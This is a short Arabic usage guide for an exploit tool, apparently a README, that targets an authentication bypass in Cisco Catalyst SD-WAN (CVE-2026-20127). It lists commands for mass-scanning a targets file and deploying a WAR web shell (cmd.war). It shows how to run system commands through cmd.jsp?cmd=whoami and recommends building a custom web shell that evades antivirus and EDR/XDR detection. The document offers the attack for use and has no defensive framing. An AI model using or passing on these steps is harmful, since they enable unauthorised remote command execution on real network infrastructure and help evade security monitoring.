
استغلال ثغرة تجاوز المصادقة في Cisco Catalyst SD-WAN (CVE-2026-20127)
استغلال ثغرة تجاوز المصادقة في Cisco Catalyst SD-WAN (CVE-2026-20127)
python scan.py -f targets.txt
python scan.py -f targets.txt -v
python scan.py -f targets.txt -t 10 -o vulnerable.txt
python scan.py -f targets.txt -w cmd.war
python scan.py -f targets.txt -w cmd.war t 10 -o vulnerable.txt
بعد نجاح استغلال الثغرة، قم بزيارة /cmd.gz/cmd.jsp?cmd=whoami وستظهر النتيجة على الصفحة
إذا كنت بحاجة إلى استبدالها بـ webshell، فقم بإنشاء حزمة WAR بنفسك (يُنصح باستخدام حصان خالٍ من برامج مكافحة الفيروسات، حيث أظهرت الاختبارات أن أنظمة Windows قد تحتوي على EDR أو XDR)